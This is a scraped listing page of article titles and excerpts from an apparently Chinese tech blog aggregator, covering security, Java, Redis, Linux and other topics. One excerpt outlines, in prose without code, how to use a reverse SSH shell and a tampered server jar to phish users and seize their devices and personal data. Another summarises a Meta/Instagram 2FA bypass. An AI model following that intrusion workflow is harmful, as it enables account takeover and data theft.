                        <div>前言前段时间，知名机构麦可思研究院发布了《2022年中国本科生就业报告》，其中详细列出近五年的本科绿牌专业，其中，信息安全位列第一。网络安全前景对于网络安全的发展与就业前景，想必无需我多言，作为当下应届生收入较高的专业之一，网络安全同样也在转行领域中占据热门位置，主要具备以下几点转行优势：行业人才缺口大，至2027年我国网安人才缺口将达327万知识体系友好，计算机及英语水平相对薄弱的同学也可学习上</div>
                    </li>
                    <li><a href="/article/1830718353442959360.htm"
                           title="【网络安全】Instagram 和 Meta 2FA 绕过漏洞" target="_blank">【网络安全】Instagram 和 Meta 2FA 绕过漏洞</a>
                        <span class="text-muted">秋说</span>
<a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a><a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/2FA/1.htm">2FA</a><a class="tag" taget="_blank" href="/search/%E6%BC%8F%E6%B4%9E%E6%8C%96%E6%8E%98/1.htm">漏洞挖掘</a>
                        <div>未经许可，不得转载。文章目录漏洞概述技术细节Meta2FA绕过步骤Instagram2FA绕过步骤总结漏洞概述该漏洞允许攻击者在具有受害者Facabook账户权限的情况下，绕过Meta的双重身份验证(2FA)机制，实现账户接管；并且也能够绕过Instagram的双重身份验证(2FA)机制，实现账户接管。技术细节该漏洞存在的原因是在Facebook账户中心检索Instagram和Meta的备份cod</div>
                    </li>
                    <li><a href="/article/1830718226540097536.htm"
                           title="【网络安全】XSS之HttpOnly防护（附实战案例）" target="_blank">【网络安全】XSS之HttpOnly防护（附实战案例）</a>
                        <span class="text-muted">秋说</span>
<a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a><a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/xss/1.htm">xss</a><a class="tag" taget="_blank" href="/search/%E5%AE%9E%E6%88%98%E6%A1%88%E4%BE%8B/1.htm">实战案例</a>
                        <div>原创文章，不得转载。文章目录HttpOnly的产生背景HttpOnly的用途配置HttpOnly实战案例总结HttpOnly的产生背景随着Web应用程序的普及，安全性问题也愈发凸显，尤其是与会话管理相关的安全漏洞。在Web应用中，服务器通常会通过HTTP协议在客户端和服务器之间传递重要信息，如会话令牌（SessionToken），这些信息通常以Cookie的形式存储在客户端浏览器中。攻击者通过跨站</div>
                    </li>
                    <li><a href="/article/1830715452700061696.htm"
                           title="获取目标机器的ssh反弹权限后，如何通过一台公网服务器的服务 jar 包进行偷梁换柱植入目录进行钓鱼，从而获取目标使用人的终端设备权限和个人信息？" target="_blank">获取目标机器的ssh反弹权限后，如何通过一台公网服务器的服务 jar 包进行偷梁换柱植入目录进行钓鱼，从而获取目标使用人的终端设备权限和个人信息？</a>
                        <span class="text-muted">代码讲故事</span>
<a class="tag" taget="_blank" href="/search/Hacker%E6%8A%80%E6%9C%AF%E6%8F%90%E5%8D%87%E5%9F%BA%E5%9C%B0/1.htm">Hacker技术提升基地</a><a class="tag" taget="_blank" href="/search/ssh/1.htm">ssh</a><a class="tag" taget="_blank" href="/search/%E6%9C%8D%E5%8A%A1%E5%99%A8/1.htm">服务器</a><a class="tag" taget="_blank" href="/search/jar/1.htm">jar</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a><a class="tag" taget="_blank" href="/search/%E6%9C%A8%E9%A9%AC/1.htm">木马</a><a class="tag" taget="_blank" href="/search/%E9%92%93%E9%B1%BC/1.htm">钓鱼</a><a class="tag" taget="_blank" href="/search/%E6%9D%83%E9%99%90/1.htm">权限</a>
                        <div>网络攻防实战中获取目标机器的ssh反弹权限后，如何通过一台公网服务器的服务jar包进行偷梁换柱植入目录进行钓鱼，从而获取目标使用人的终端设备权限和个人信息？具体流程如下：1）获取了目标用户经常访问的一台服务器信息，并能反弹shell回来进行远程ssh链接；2）分析服务器上的运行的服务，例如：通过jar包运行的相关web服务，本次以这个jar包切入为例；3）通过对jar包进行分析植入钓鱼链接，模拟各</div>
                    </li>
                    <li><a href="/article/1830711167492911104.htm"
                           title="通过MATLAB将EXCEL表格转化为DBC数据库" target="_blank">通过MATLAB将EXCEL表格转化为DBC数据库</a>
                        <span class="text-muted">fpga和matlab</span>
<a class="tag" taget="_blank" href="/search/MATLAB/1.htm">MATLAB</a><a class="tag" taget="_blank" href="/search/%E6%9D%BF%E5%9D%9711%3AMATLAB%E6%95%B0%E5%80%BC%E4%BB%BF%E7%9C%9F/1.htm">板块11:MATLAB数值仿真</a><a class="tag" taget="_blank" href="/search/matlab/1.htm">matlab</a><a class="tag" taget="_blank" href="/search/excel/1.htm">excel</a>
                        <div>目录一、转化原理二、实现过程三、应用领域四、核心程序在现代工程和通信领域中，数据交换和共享是至关重要的。ControllerAreaNetwork（CAN）是一种广泛应用于汽车和工业领域的通信协议，而CAN数据库（DBC）是CAN网络中的关键组件，用于描述网络上的消息、信号和节点。一、转化原理CAN网络中的DBC文件包含了网络中所有消息和信号的定义、布局和属性。转化EXCEL表格为DBC文件的基本</div>
                    </li>
                    <li><a href="/article/1830707891926036480.htm"
                           title="OpenAI Chatgpt发展历史和Chatgpt-3的研发过程工作原理" target="_blank">OpenAI Chatgpt发展历史和Chatgpt-3的研发过程工作原理</a>
                        <span class="text-muted">roxxo</span>
<a class="tag" taget="_blank" href="/search/gpt-3/1.htm">gpt-3</a><a class="tag" taget="_blank" href="/search/%E6%B7%B1%E5%BA%A6%E5%AD%A6%E4%B9%A0/1.htm">深度学习</a><a class="tag" taget="_blank" href="/search/%E4%BA%BA%E5%B7%A5%E6%99%BA%E8%83%BD/1.htm">人工智能</a><a class="tag" taget="_blank" href="/search/chatgpt/1.htm">chatgpt</a>
                        <div>ChatGPT是由OpenAI的研究团队基于GPT技术（GenerativePre-trainedTransformer）开发的AI对话引擎。ChatGPT发展历史如下：2015年，GPT技术由OpenAI的研究团队首次提出。该技术使用了一种无需人类标注的方式，使神经网络学习到了大量自然语言处理任务的知识。2018年，OpenAI团队开发了第一个GPT模型，并在自然语言处理领域取得了显著的成果。该</div>
                    </li>
                    <li><a href="/article/1830707638757847040.htm"
                           title="令牌桶算法：原理与代码实现" target="_blank">令牌桶算法：原理与代码实现</a>
                        <span class="text-muted">Lill_bin</span>
<a class="tag" taget="_blank" href="/search/%E6%9D%82%E8%B0%88/1.htm">杂谈</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C/1.htm">网络</a><a class="tag" taget="_blank" href="/search/%E6%9C%8D%E5%8A%A1%E5%99%A8/1.htm">服务器</a><a class="tag" taget="_blank" href="/search/%E8%BF%90%E7%BB%B4/1.htm">运维</a><a class="tag" taget="_blank" href="/search/%E5%A4%A7%E6%95%B0%E6%8D%AE/1.htm">大数据</a><a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/%E5%BC%80%E5%8F%91%E8%AF%AD%E8%A8%80/1.htm">开发语言</a><a class="tag" taget="_blank" href="/search/%E5%90%8E%E7%AB%AF/1.htm">后端</a>
                        <div>引言令牌桶算法（TokenBucketAlgorithm）是一种网络流量整形（TrafficShaping）和速率限制（RateLimiting）的算法。它能够限制数据传输的平均速率，同时允许某种程度的突发传输。在许多场景中，如网络带宽管理、API速率限制等，令牌桶算法都得到了广泛的应用。原理令牌桶算法的核心思想是使用一个虚拟的“桶”来存储令牌，每个令牌代表一个数据包的传输权限。系统按照固定的速率</div>
                    </li>
                    <li><a href="/article/1830703226035466240.htm"
                           title="Scrapy框架架构---学习笔记" target="_blank">Scrapy框架架构---学习笔记</a>
                        <span class="text-muted">怪猫訷</span>
<a class="tag" taget="_blank" href="/search/python/1.htm">python</a>
                        <div>Scrapy框架架构Scrapy框架介绍：写一个爬虫，需要做很多的事情。比如：发送网络请求、数据解析、数据存储、反反爬虫机制（更换ip代理、设置请求头等）、异步请求等。这些工作如果每次都要自己从零开始写的话，比较浪费时间。因此Scrapy把一些基础的东西封装好了，在他上面写爬虫可以变的更加的高效（爬取效率和开发效率）。因此真正在公司里，一些上了量的爬虫，都是使用Scrapy框架来解决。Scrapy</div>
                    </li>
                    <li><a href="/article/1830702507245006848.htm"
                           title="财商觉醒课 第五讲 -- 如何培养吸引财富的“好运体质”" target="_blank">财商觉醒课 第五讲 -- 如何培养吸引财富的“好运体质”</a>
                        <span class="text-muted">童_刚</span>

                        <div>三个让我印象最深刻的地方主题：财富的“因”是什么a.做一个认真靠谱的人（靠谱比聪明更重要）个人思考：自认为自己是一个认真靠谱的人，但是副作用是自己容易拘泥于细节，而欠缺了长期的战略规划。所以认真靠谱是必要条件，而非充分条件，还是应做到“扬长避短”b.构建“知识网络”把钱花在学习和成长上，别怕浪费。个人思考：自己原先买过“生财有术”等付费社群，但实际上打开次数很少，后续就没有再次续费。现在看来，还是</div>
                    </li>
                    <li><a href="/article/1830701612386054144.htm"
                           title="在婚姻中活得很累的女人，往往都有哪些特征" target="_blank">在婚姻中活得很累的女人，往往都有哪些特征</a>
                        <span class="text-muted">白衣梧桐</span>

                        <div>图片来自网络亦舒说过：“婚姻真正意义，那不只是恩爱缠绵，柔情蜜意，而是生关死劫，有个可靠可商量可信任的人。”的确如此。我们之所以渴望婚姻，是因为我们想要找一个知冷知热的伴侣。无论我们在外边承受了怎样的压力或打击，我们总是能够及时找到那个真正可以依靠和信赖的人。当一段婚姻的存在，已经变成了你的某种负担，你在婚姻中活得特别累，那么肯定是两个方面的原因造成的。首先，是你自己没有摆正好你在婚姻中的位置。其</div>
                    </li>
                    <li><a href="/article/1830701209900642304.htm"
                           title="[Redis]典型应用——缓存" target="_blank">[Redis]典型应用——缓存</a>
                        <span class="text-muted">a_zhee1</span>
<a class="tag" taget="_blank" href="/search/Redis/1.htm">Redis</a><a class="tag" taget="_blank" href="/search/%E7%BC%93%E5%AD%98/1.htm">缓存</a><a class="tag" taget="_blank" href="/search/redis/1.htm">redis</a><a class="tag" taget="_blank" href="/search/%E6%95%B0%E6%8D%AE%E5%BA%93/1.htm">数据库</a>
                        <div>什么是缓存缓存（Cache）是一种用于临时存储数据的机制，目的是提高数据访问速度和系统性能。核心思路就是把一些常用的数据放到触手可及(访问速度更快)的地方，方便随时读取缓存是一个相对的概念，比如说，对于硬件的访问速度来说，CPU寄存器>内存>硬盘>网络那么，cpu寄存器就是内存的缓存，内存是硬盘的缓存，硬盘又是网络的缓存对于计算机硬件来说,往往访问速度越快的设备,成本越高,存储空间越小，缓存是更快</div>
                    </li>
                    <li><a href="/article/1830700215007539200.htm"
                           title="如何做好线上营销？成功老板线上营销推广的方法和技巧大揭秘" target="_blank">如何做好线上营销？成功老板线上营销推广的方法和技巧大揭秘</a>
                        <span class="text-muted">日常购物技巧呀</span>

                        <div>国内外市场的不断扩大以及互联网的日益普及，传统的市场营销变得无法适应市场的变化和需求，而网络营销则成为了传统营销手段的重要补充，并逐步取代传统的一些营销方式。小白建议从简单低投入的入手，尽量选择一些免费的渠道。拂晓导师擅长软文推广，另外也有自己带团的项目和团队，高省APP佣金更高，模式更好。【高省】是一个可省钱佣金高，能赚钱有收益的平台，百度有几百万篇报道，也期待你的加入。拂晓导师高省邀请码989</div>
                    </li>
                                <li><a href="/article/38.htm"
                                       title="ASM系列六 利用TreeApi 添加和移除类成员" target="_blank">ASM系列六 利用TreeApi 添加和移除类成员</a>
                                    <span class="text-muted">lijingyao8206</span>
<a class="tag" taget="_blank" href="/search/jvm/1.htm">jvm</a><a class="tag" taget="_blank" href="/search/%E5%8A%A8%E6%80%81%E4%BB%A3%E7%90%86/1.htm">动态代理</a><a class="tag" taget="_blank" href="/search/ASM/1.htm">ASM</a><a class="tag" taget="_blank" href="/search/%E5%AD%97%E8%8A%82%E7%A0%81%E6%8A%80%E6%9C%AF/1.htm">字节码技术</a><a class="tag" taget="_blank" href="/search/TreeAPI/1.htm">TreeAPI</a>
                                    <div>&nbsp; &nbsp; 同生成的做法一样，添加和移除类成员只要去修改fields和methods中的元素即可。这里我们拿一个简单的类做例子，下面这个Task类，我们来移除isNeedRemove方法，并且添加一个int 类型的addedField属性。 
&nbsp; 
package asm.core;

/**
 * Created by yunshen.ljy on 2015/6/</div>
                                </li>
                                <li><a href="/article/165.htm"
                                       title="Springmvc-权限设计" target="_blank">Springmvc-权限设计</a>
                                    <span class="text-muted">bee1314</span>
<a class="tag" taget="_blank" href="/search/spring/1.htm">spring</a><a class="tag" taget="_blank" href="/search/Web/1.htm">Web</a><a class="tag" taget="_blank" href="/search/jsp/1.htm">jsp</a>
                                    <div> 
 万丈高楼平地起。 
 
权限管理对于管理系统而言已经是标配中的标配了吧，对于我等俗人更是不能免俗。同时就目前的项目状况而言，我们还不需要那么高大上的开源的解决方案，如Spring Security，Shiro。小伙伴一致决定我们还是从基本的功能迭代起来吧。 
目标：  
1.实现权限的管理（CRUD）
2.实现部门管理 （CRUD)
3.实现人员的管理 （CRUD）
4.实现部门和权限</div>
                                </li>
                                <li><a href="/article/292.htm"
                                       title="算法竞赛入门经典（第二版）第2章习题" target="_blank">算法竞赛入门经典（第二版）第2章习题</a>
                                    <span class="text-muted">CrazyMizzz</span>
<a class="tag" taget="_blank" href="/search/c/1.htm">c</a><a class="tag" taget="_blank" href="/search/%E7%AE%97%E6%B3%95/1.htm">算法</a>
                                    <div>2.4.1 输出技巧 
#include &lt;stdio.h&gt; 
 
int 
main() 
{ 
 int i, n; 
 
 scanf(&quot;%d&quot;, &amp;n); 
 for (i = 1; i &lt;= n; i++) 
 printf(&quot;%d\n&quot;, i); 
 return 0; 
} 
 
习题2-2 水仙花数(daffodil</div>
                                </li>
                                <li><a href="/article/419.htm"
                                       title="struts2中jsp自动跳转到Action" target="_blank">struts2中jsp自动跳转到Action</a>
                                    <span class="text-muted">麦田的设计者</span>
<a class="tag" taget="_blank" href="/search/jsp/1.htm">jsp</a><a class="tag" taget="_blank" href="/search/webxml/1.htm">webxml</a><a class="tag" taget="_blank" href="/search/struts2/1.htm">struts2</a><a class="tag" taget="_blank" href="/search/%E8%87%AA%E5%8A%A8%E8%B7%B3%E8%BD%AC/1.htm">自动跳转</a>
                                    <div>1、在struts2的开发中，经常需要用户点击网页后就直接跳转到一个Action，执行Action里面的方法，利用mvc分层思想执行相应操作在界面上得到动态数据。毕竟用户不可能在地址栏里输入一个Action（不是专业人士） 
&nbsp; 
2、＜jsp:forward page=&quot;xxx.action&quot; /＞ ，这个标签可以实现跳转，page的路径是相对地址,不同与jsp和j</div>
                                </li>
                                <li><a href="/article/546.htm"
                                       title="php 操作webservice实例" target="_blank">php 操作webservice实例</a>
                                    <span class="text-muted">IT独行者</span>
<a class="tag" taget="_blank" href="/search/PHP/1.htm">PHP</a><a class="tag" taget="_blank" href="/search/webservice/1.htm">webservice</a>
                                    <div>首先大家要简单了解了何谓webservice，接下来就做两个非常简单的例子，webservice还是逃不开server端与client端。我测试的环境为：apache2.2.11&nbsp;php5.2.10做这个测试之前，要确认你的php配置文件中已经将soap扩展打开，即extension=php_soap.dll; 
OK 现在我们来体验webservice 
//server端 serve</div>
                                </li>
                                <li><a href="/article/673.htm"
                                       title="Windows下使用Vagrant安装linux系统" target="_blank">Windows下使用Vagrant安装linux系统</a>
                                    <span class="text-muted">_wy_</span>
<a class="tag" taget="_blank" href="/search/windows/1.htm">windows</a><a class="tag" taget="_blank" href="/search/vagrant/1.htm">vagrant</a>
                                    <div>准备工作： 
下载安装 VirtualBox ：https://www.virtualbox.org/ 
下载安装 Vagrant ：http://www.vagrantup.com/ 
下载需要使用的 box ： 
官方提供的范例：http://files.vagrantup.com/precise32.box 
还可以在&nbsp;http://www.vagrantbox.es/&nbsp;</div>
                                </li>
                                <li><a href="/article/800.htm"
                                       title="更改linux的文件拥有者及用户组(chown和chgrp)" target="_blank">更改linux的文件拥有者及用户组(chown和chgrp)</a>
                                    <span class="text-muted">无量</span>
<a class="tag" taget="_blank" href="/search/c/1.htm">c</a><a class="tag" taget="_blank" href="/search/linux/1.htm">linux</a><a class="tag" taget="_blank" href="/search/chgrp/1.htm">chgrp</a><a class="tag" taget="_blank" href="/search/chown/1.htm">chown</a>
                                    <div>本文（转）  
http://blog.163.com/yanenshun@126/blog/static/128388169201203011157308/   
http://ydlmlh.iteye.com/blog/1435157   
一、基本使用：    
使用chown命令可以修改文件或目录所属的用户： 
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 命令</div>
                                </li>
                                <li><a href="/article/927.htm"
                                       title="linux下抓包工具" target="_blank">linux下抓包工具</a>
                                    <span class="text-muted">矮蛋蛋</span>
<a class="tag" taget="_blank" href="/search/linux/1.htm">linux</a>
                                    <div>原文地址： 
http://blog.chinaunix.net/uid-23670869-id-2610683.html 
tcpdump -nn -vv -X udp port 8888 
上面命令是抓取udp包、端口为8888 
netstat -tln 命令是用来查看linux的端口使用情况 
 
13 . 列出所有的网络连接 
lsof -i 
14. 列出所有tcp 网络连接信息 
l</div>
                                </li>
                                <li><a href="/article/1054.htm"
                                       title="我觉得mybatis是垃圾！：“每一个用mybatis的男纸，你伤不起”" target="_blank">我觉得mybatis是垃圾！：“每一个用mybatis的男纸，你伤不起”</a>
                                    <span class="text-muted">alafqq</span>
<a class="tag" taget="_blank" href="/search/mybatis/1.htm">mybatis</a>
                                    <div>最近看了&nbsp; 
每一个用mybatis的男纸，你伤不起 
原文地址 ：http://www.iteye.com/topic/1073938 
发表一下个人看法。欢迎大神拍砖； 
 
个人一直使用的是Ibatis框架，公司对其进行过小小的改良； 
最近换了公司，要使用新的框架。听说mybatis不错；就对其进行了部分的研究； 
 
发现多了一个mapper层；个人感觉就是个dao； 
 
 </div>
                                </li>
                                <li><a href="/article/1181.htm"
                                       title="解决java数据交换之谜" target="_blank">解决java数据交换之谜</a>
                                    <span class="text-muted">百合不是茶</span>
<a class="tag" taget="_blank" href="/search/%E6%95%B0%E6%8D%AE%E4%BA%A4%E6%8D%A2/1.htm">数据交换</a>
                                    <div>交换两个数字的方法有以下三种  ，其中第一种最常用
 
&nbsp; 
/*
输出最小的一个数
*/
public class jiaohuan1 {

	public static void main(String[] args) {
	int a =4;
	int b = 3;
		if(a&lt;b){
         //  第一种交换方式
		int tmep =</div>
                                </li>
                                <li><a href="/article/1308.htm"
                                       title="渐变显示" target="_blank">渐变显示</a>
                                    <span class="text-muted">bijian1013</span>
<a class="tag" taget="_blank" href="/search/JavaScript/1.htm">JavaScript</a>
                                    <div>&lt;style type=&quot;text/css&quot;&gt;
 #wxf {
  FILTER: progid:DXImageTransform.Microsoft.Gradient(GradientType=0, StartColorStr=#ffffff, EndColorStr=#97FF98);
  height: 25px;
 }
&lt;/style&gt;</div>
                                </li>
                                <li><a href="/article/1435.htm"
                                       title="探索JUnit4扩展：断言语法assertThat" target="_blank">探索JUnit4扩展：断言语法assertThat</a>
                                    <span class="text-muted">bijian1013</span>
<a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/%E5%8D%95%E5%85%83%E6%B5%8B%E8%AF%95/1.htm">单元测试</a><a class="tag" taget="_blank" href="/search/assertThat/1.htm">assertThat</a>
                                    <div>一.概述 
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; JUnit 设计的目的就是有效地抓住编程人员写代码的意图，然后快速检查他们的代码是否与他们的意图相匹配。 JUnit 发展至今，版本不停的翻新，但是所有版本都一致致力于解决一个问题，那就是如何发现编程人员的代码意图，并且如何使得编程人员更加容易地表达他们的代码意图。JUnit 4.4 也是为了如何能够</div>
                                </li>
                                <li><a href="/article/1562.htm"
                                       title="【Gson三】Gson解析{"data":{"IM":["MSN","QQ","Gtalk"]}}" target="_blank">【Gson三】Gson解析{"data":{"IM":["MSN","QQ","Gtalk"]}}</a>
                                    <span class="text-muted">bit1129</span>
<a class="tag" taget="_blank" href="/search/gson/1.htm">gson</a>
                                    <div>&nbsp;  
如何把如下简单的JSON字符串反序列化为Java的POJO对象? 
{&quot;data&quot;:{&quot;IM&quot;:[&quot;MSN&quot;,&quot;QQ&quot;,&quot;Gtalk&quot;]}} 
&nbsp; 
下面的POJO类Model无法完成正确的解析： 
&nbsp; 
import com.google.gson.Gson;</div>
                                </li>
                                <li><a href="/article/1689.htm"
                                       title="【Kafka九】Kafka High Level API vs. Low Level API" target="_blank">【Kafka九】Kafka High Level API vs. Low Level API</a>
                                    <span class="text-muted">bit1129</span>
<a class="tag" taget="_blank" href="/search/kafka/1.htm">kafka</a>
                                    <div>1. Kafka提供了两种Consumer API 
 
 High Level Consumer API 
 Low Level Consumer API(Kafka诡异的称之为Simple Consumer API，实际上非常复杂) 
 
在选用哪种Consumer API时，首先要弄清楚这两种API的工作原理，能做什么不能做什么，能做的话怎么做的以及用的时候，有哪些可能的问题 
&nbsp;</div>
                                </li>
                                <li><a href="/article/1816.htm"
                                       title="在nginx中集成lua脚本：添加自定义Http头，封IP等" target="_blank">在nginx中集成lua脚本：添加自定义Http头，封IP等</a>
                                    <span class="text-muted">ronin47</span>
<a class="tag" taget="_blank" href="/search/nginx+lua/1.htm">nginx lua</a>
                                    <div>Lua是一个可以嵌入到Nginx配置文件中的动态脚本语言，从而可以在Nginx请求处理的任何阶段执行各种Lua代码。刚开始我们只是用Lua 把请求路由到后端服务器，但是它对我们架构的作用超出了我们的预期。下面就讲讲我们所做的工作。 强制搜索引擎只索引mixlr.com 
Google把子域名当作完全独立的网站，我们不希望爬虫抓取子域名的页面，降低我们的Page rank。 
location /{</div>
                                </li>
                                <li><a href="/article/1943.htm"
                                       title="java-归并排序" target="_blank">java-归并排序</a>
                                    <span class="text-muted">bylijinnan</span>
<a class="tag" taget="_blank" href="/search/java/1.htm">java</a>
                                    <div>
import java.util.Arrays;


public class MergeSort {

	
	public static void main(String[] args) {

		int[] a={20,1,3,8,5,9,4,25};
		mergeSort(a,0,a.length-1);
		System.out.println(Arrays.to</div>
                                </li>
                                <li><a href="/article/2070.htm"
                                       title="Netty源码学习-CompositeChannelBuffer" target="_blank">Netty源码学习-CompositeChannelBuffer</a>
                                    <span class="text-muted">bylijinnan</span>
<a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/netty/1.htm">netty</a>
                                    <div>CompositeChannelBuffer体现了Netty的“Transparent Zero Copy” 
 
查看API（ 
http://docs.jboss.org/netty/3.2/api/org/jboss/netty/buffer/package-summary.html#package_description） 
可以看到，所谓“Transparent Zero Copy”是通</div>
                                </li>
                                <li><a href="/article/2197.htm"
                                       title="Android中给Activity添加返回键" target="_blank">Android中给Activity添加返回键</a>
                                    <span class="text-muted">hotsunshine</span>
<a class="tag" taget="_blank" href="/search/Activity/1.htm">Activity</a>
                                    <div>       
// this need android:minSdkVersion=&quot;11&quot;
 getActionBar().setDisplayHomeAsUpEnabled(true);
 
 
 
   
 @Override
    public boolean onOptionsItemSelected(MenuItem item) {
        </div>
                                </li>
                                <li><a href="/article/2324.htm"
                                       title="静态页面传参" target="_blank">静态页面传参</a>
                                    <span class="text-muted">ctrain</span>
<a class="tag" taget="_blank" href="/search/%E9%9D%99%E6%80%81/1.htm">静态</a>
                                    <div>
$(document).ready(function () {
	var request = {
		QueryString :
		function (val) {
			var uri = window.location.search;
			var re = new RegExp(&quot;&quot; + val + &quot;=([^&amp;?]*)&quot;, &</div>
                                </li>
                                <li><a href="/article/2451.htm"
                                       title="Windows中查找某个目录下的所有文件中包含某个字符串的命令" target="_blank">Windows中查找某个目录下的所有文件中包含某个字符串的命令</a>
                                    <span class="text-muted">daizj</span>
<a class="tag" taget="_blank" href="/search/windows/1.htm">windows</a><a class="tag" taget="_blank" href="/search/%E6%9F%A5%E6%89%BE%E6%9F%90%E4%B8%AA%E7%9B%AE%E5%BD%95%E4%B8%8B%E7%9A%84%E6%89%80%E6%9C%89%E6%96%87%E4%BB%B6/1.htm">查找某个目录下的所有文件</a><a class="tag" taget="_blank" href="/search/%E5%8C%85%E5%90%AB%E6%9F%90%E4%B8%AA%E5%AD%97%E7%AC%A6%E4%B8%B2/1.htm">包含某个字符串</a>
                                    <div>findstr可以完成这个工作。 
&nbsp;    
[html]&nbsp; 
view plain 
copy  &nbsp;    
 
 &gt;findstr&nbsp;/s&nbsp;/i&nbsp;&quot;string&quot;&nbsp;*.*&nbsp;&nbsp; 
  
上面的命令表示，当前目录以及当前目录的所有子目录下的所有文件中查找&quot;string&qu</div>
                                </li>
                                <li><a href="/article/2578.htm"
                                       title="改善程序代码质量的一些技巧" target="_blank">改善程序代码质量的一些技巧</a>
                                    <span class="text-muted">dcj3sjt126com</span>
<a class="tag" taget="_blank" href="/search/%E7%BC%96%E7%A8%8B/1.htm">编程</a><a class="tag" taget="_blank" href="/search/PHP/1.htm">PHP</a><a class="tag" taget="_blank" href="/search/%E9%87%8D%E6%9E%84/1.htm">重构</a>
                                    <div>有很多理由都能说明为什么我们应该写出清晰、可读性好的程序。最重要的一点，程序你只写一次，但以后会无数次的阅读。当你第二天回头来看你的代码 时，你就要开始阅读它了。当你把代码拿给其他人看时，他必须阅读你的代码。因此，在编写时多花一点时间，你会在阅读它时节省大量的时间。让我们看一些基本的编程技巧：&nbsp;&nbsp;&nbsp; 尽量保持方法简短&nbsp;&nbsp;&nbsp; 尽管很多人都遵</div>
                                </li>
                                <li><a href="/article/2705.htm"
                                       title="SharedPreferences对数据的存储" target="_blank">SharedPreferences对数据的存储</a>
                                    <span class="text-muted">dcj3sjt126com</span>

                                    <div>SharedPreferences简介： &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbs</div>
                                </li>
                                <li><a href="/article/2832.htm"
                                       title="linux复习笔记之bash shell (2) bash基础" target="_blank">linux复习笔记之bash shell (2) bash基础</a>
                                    <span class="text-muted">eksliang</span>
<a class="tag" taget="_blank" href="/search/bash/1.htm">bash</a><a class="tag" taget="_blank" href="/search/bash+shell/1.htm">bash shell</a>
                                    <div>转载请出自出处：
http://eksliang.iteye.com/blog/2104329  
1.影响显示结果的语系变量（locale） 
&nbsp;1.1locale这个命令就是查看当前系统支持多少种语系，命令使用如下： 
[root@localhost shell]# locale
LANG=en_US.UTF-8
LC_CTYPE=&quot;en_US.UTF-8&quot;
</div>
                                </li>
                                <li><a href="/article/2959.htm"
                                       title="Android零碎知识总结" target="_blank">Android零碎知识总结</a>
                                    <span class="text-muted">gqdy365</span>
<a class="tag" taget="_blank" href="/search/android/1.htm">android</a>
                                    <div>1、CopyOnWriteArrayList add(E) 和remove(int index)都是对新的数组进行修改和新增。所以在多线程操作时不会出现java.util.ConcurrentModificationException错误。 
所以最后得出结论：CopyOnWriteArrayList适合使用在读操作远远大于写操作的场景里，比如缓存。发生修改时候做copy，新老版本分离，保证读的高</div>
                                </li>
                                <li><a href="/article/3086.htm"
                                       title="HoverTree.Model.ArticleSelect类的作用" target="_blank">HoverTree.Model.ArticleSelect类的作用</a>
                                    <span class="text-muted">hvt</span>
<a class="tag" taget="_blank" href="/search/Web/1.htm">Web</a><a class="tag" taget="_blank" href="/search/.net/1.htm">.net</a><a class="tag" taget="_blank" href="/search/C%23/1.htm">C#</a><a class="tag" taget="_blank" href="/search/hovertree/1.htm">hovertree</a><a class="tag" taget="_blank" href="/search/asp.net/1.htm">asp.net</a>
                                    <div>ArticleSelect类在命名空间HoverTree.Model中可以认为是文章查询条件类，用于存放查询文章时的条件，例如HvtId就是文章的id。HvtIsShow就是文章的显示属性，当为-1是，该条件不产生作用，当为0时，查询不公开显示的文章，当为1时查询公开显示的文章。HvtIsHome则为是否在首页显示。HoverTree系统源码完全开放，开发环境为Visual Studio 2013</div>
                                </li>
                                <li><a href="/article/3213.htm"
                                       title="PHP 判断是否使用代理 PHP Proxy Detector" target="_blank">PHP 判断是否使用代理 PHP Proxy Detector</a>
                                    <span class="text-muted">天梯梦</span>
<a class="tag" taget="_blank" href="/search/proxy/1.htm">proxy</a>
                                    <div>1. php 类 
I found this class looking for something else actually but I remembered I needed some while ago something similar and I never found one. I'm sure it will help a lot of developers who try to </div>
                                </li>
                                <li><a href="/article/3340.htm"
                                       title="apache的math库中的回归——regression（翻译）" target="_blank">apache的math库中的回归——regression（翻译）</a>
                                    <span class="text-muted">lvdccyb</span>
<a class="tag" taget="_blank" href="/search/Math/1.htm">Math</a><a class="tag" taget="_blank" href="/search/apache/1.htm">apache</a>
                                    <div>这个Math库，虽然不向weka那样专业的ML库，但是用户友好，易用。 
多元线性回归，协方差和相关性（皮尔逊和斯皮尔曼），分布测试（假设检验，t，卡方，G），统计。 
&nbsp; 
数学库中还包含，Cholesky，LU，SVD，QR，特征根分解，真不错。 
&nbsp; 
基本覆盖了：线代，统计，矩阵， 
最优化理论 
曲线拟合 
常微分方程 
遗传算法（GA）， 
还有3维的运算。。。 
</div>
                                </li>
                                <li><a href="/article/3467.htm"
                                       title="基础数据结构和算法十三：Undirected Graphs (2)" target="_blank">基础数据结构和算法十三：Undirected Graphs (2)</a>
                                    <span class="text-muted">sunwinner</span>
<a class="tag" taget="_blank" href="/search/Algorithm/1.htm">Algorithm</a>
                                    <div>&nbsp; 
Design pattern for graph processing.  
Since we consider a large number of graph-processing algorithms, our initial design goal is to decouple our implementations from the graph representation</div>
                                </li>
                                <li><a href="/article/3594.htm"
                                       title="云计算平台最重要的五项技术" target="_blank">云计算平台最重要的五项技术</a>
                                    <span class="text-muted">sumapp</span>
